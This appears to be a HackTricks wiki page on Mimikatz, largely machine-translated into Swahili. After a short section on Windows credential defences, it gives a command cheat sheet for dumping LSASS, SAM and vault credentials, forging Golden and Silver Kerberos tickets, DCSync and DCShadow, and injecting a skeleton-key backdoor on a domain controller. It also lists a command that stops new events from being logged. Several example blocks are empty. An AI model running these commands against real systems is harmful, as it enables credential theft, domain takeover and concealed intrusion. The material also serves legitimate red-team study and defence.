Mimikatz
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
This page is based on one from adsecurity.org. Check the original for further info!
Kuanzia Windows 8.1 na Windows Server 2012 R2 kuendelea, hatua kubwa zimechukuliwa kulinda dhidi ya wizi wa akidi:
LM hashes na nywila za maandiko ya kawaida hazihifadhiwi tena katika kumbukumbu ili kuboresha usalama. Mipangilio maalum ya rejista, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" inapaswa kuwekwa na thamani ya DWORD ya 0
ili kuzima Uthibitishaji wa Digest, kuhakikisha kwamba nywila "za maandiko ya kawaida" hazihifadhiwi katika LSASS.
Ulinzi wa LSA umeanzishwa ili kulinda mchakato wa Mamlaka ya Usalama wa Mitaa (LSA) kutoka kwa usomaji wa kumbukumbu usioidhinishwa na sindano ya msimbo. Hii inafikiwa kwa kuashiria LSASS kama mchakato uliohifadhiwa. Kuanzisha Ulinzi wa LSA kunahusisha:
Kubadilisha rejista katika HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa kwa kuweka RunAsPPL
kuwa dword:00000001
.
Kutekeleza Kituo cha Sera ya Kundi (GPO) kinacholazimisha mabadiliko haya ya rejista katika vifaa vinavyosimamiwa.
Licha ya ulinzi huu, zana kama Mimikatz zinaweza kupita Ulinzi wa LSA kwa kutumia madereva maalum, ingawa vitendo kama hivyo vinaweza kurekodiwa katika kumbukumbu za matukio.
Wasimamizi kwa kawaida wana SeDebugPrivilege, inayo wawezesha kufuatilia programu. Haki hii inaweza kupunguzwa ili kuzuia matukio yasiyoidhinishwa ya kumbukumbu, mbinu ya kawaida inayotumiwa na washambuliaji kutoa akidi kutoka kwa kumbukumbu. Hata hivyo, hata haki hii ikiondolewa, akaunti ya TrustedInstaller bado inaweza kufanya matukio ya kumbukumbu kwa kutumia usanidi maalum wa huduma:
Hii inaruhusu kutolewa kwa kumbukumbu ya lsass.exe
kwenye faili, ambayo inaweza kuchambuliwa kwenye mfumo mwingine ili kutoa akidi:
Event log tampering in Mimikatz involves two primary actions: clearing event logs and patching the Event service to prevent logging of new events. Below are the commands for performing these actions:
Command: Hii hatua inalenga kufuta kumbukumbu za matukio, na kufanya iwe vigumu kufuatilia shughuli mbaya.
Mimikatz haitoi amri moja kwa moja katika hati zake za kawaida za kufuta kumbukumbu za matukio moja kwa moja kupitia mstari wake wa amri. Hata hivyo, usimamizi wa kumbukumbu za matukio kwa kawaida unahusisha kutumia zana za mfumo au skripti nje ya Mimikatz kufuta kumbukumbu maalum (kwa mfano, kutumia PowerShell au Windows Event Viewer).
Command: event::drop
Hii amri ya majaribio imeundwa kubadilisha tabia ya Huduma ya Kumbukumbu za Matukio, kwa ufanisi kuzuia kurekodi matukio mapya.
Mfano: mimikatz "privilege::debug" "event::drop" exit
Amri ya privilege::debug
inahakikisha kwamba Mimikatz inafanya kazi kwa ruhusa zinazohitajika kubadilisha huduma za mfumo.
Amri ya event::drop
kisha inarekebisha huduma ya Kumbukumbu za Matukio.
A Golden Ticket allows for domain-wide access impersonation. Key command and parameters:
Command: kerberos::golden
Parameters:
/domain
: Jina la kikoa.
/sid
: Kitambulisho cha Usalama wa kikoa (SID).
/user
: Jina la mtumiaji wa kuiga.
/krbtgt
: Hash ya NTLM ya akaunti ya huduma ya KDC ya kikoa.
/ptt
: Inachoma tiketi moja kwa moja kwenye kumbukumbu.
/ticket
: Huhifadhi tiketi kwa matumizi ya baadaye.
Example:
Silver Tickets hutoa ufikiaji kwa huduma maalum. Amri kuu na vigezo:
Amri: Inafanana na Golden Ticket lakini inalenga huduma maalum.
Vigezo:
/service
: Huduma ya kulenga (mfano, cifs, http).
Vigezo vingine vinashabihiana na Golden Ticket.
Mfano:
Tiketi za Kuamini zinatumika kwa kupata rasilimali kati ya maeneo kwa kutumia uhusiano wa kuamini. Amri kuu na vigezo:
Amri: Inafanana na Tiketi ya Dhahabu lakini kwa uhusiano wa kuamini.
Vigezo:
/target
: FQDN ya eneo lengwa.
/rc4
: Hash ya NTLM kwa akaunti ya kuamini.
Mfano:
Orodha ya Tiketi:
Amri: kerberos::list
Inoorodhesha tiketi zote za Kerberos kwa kikao cha mtumiaji wa sasa.
Pita kwenye Kache:
Amri: kerberos::ptc
Inachanganya tiketi za Kerberos kutoka kwenye faili za kache.
Mfano: mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Pita Tiketi:
Amri: kerberos::ptt
Inaruhusu kutumia tiketi ya Kerberos katika kikao kingine.
Mfano: mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Futa Tiketi:
Amri: kerberos::purge
Inafuta tiketi zote za Kerberos kutoka kwenye kikao.
Inafaida kabla ya kutumia amri za kubadilisha tiketi ili kuepuka migongano.
DCShadow: Fanya mashine ifanye kazi kama DC kwa ajili ya kubadilisha vitu vya AD.
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: Fanya kama DC ili kuomba data za nywila.
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
LSADUMP::LSA: Toa akiba kutoka LSA.
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: Fanya kama DC kwa kutumia data za nywila za akaunti ya kompyuta.
Hakuna amri maalum iliyotolewa kwa NetSync katika muktadha wa awali.
LSADUMP::SAM: Fikia hifadhidata ya SAM ya ndani.
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: Fanya ufichuzi wa siri zilizohifadhiwa kwenye rejista.
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: Weka hash mpya ya NTLM kwa mtumiaji.
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: Pata taarifa za uthibitisho wa uaminifu.
mimikatz "lsadump::trust" exit
MISC::Skeleton: Ingiza mlango wa nyuma kwenye LSASS kwenye DC.
mimikatz "privilege::debug" "misc::skeleton" exit
PRIVILEGE::Backup: Pata haki za nakala.
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: Pata haki za debug.
mimikatz "privilege::debug" exit
SEKURLSA::LogonPasswords: Onyesha akiba za watumiaji walioingia.
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: Toa tiketi za Kerberos kutoka kwenye kumbukumbu.
mimikatz "sekurlsa::tickets /export" exit
SID::add/modify: Badilisha SID na SIDHistory.
Ongeza: mimikatz "sid::add /user:targetUser /sid:newSid" exit
Badilisha: Hakuna amri maalum ya kubadilisha katika muktadha wa awali.
TOKEN::Elevate: Fanya kama token.
mimikatz "token::elevate /domainadmin" exit
TS::MultiRDP: Ruhusu vikao vingi vya RDP.
mimikatz "ts::multirdp" exit
TS::Sessions: Orodhesha vikao vya TS/RDP.
Hakuna amri maalum iliyotolewa kwa TS::Sessions katika muktadha wa awali.
Toa nywila kutoka Windows Vault.
mimikatz "vault::cred /patch" exit
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)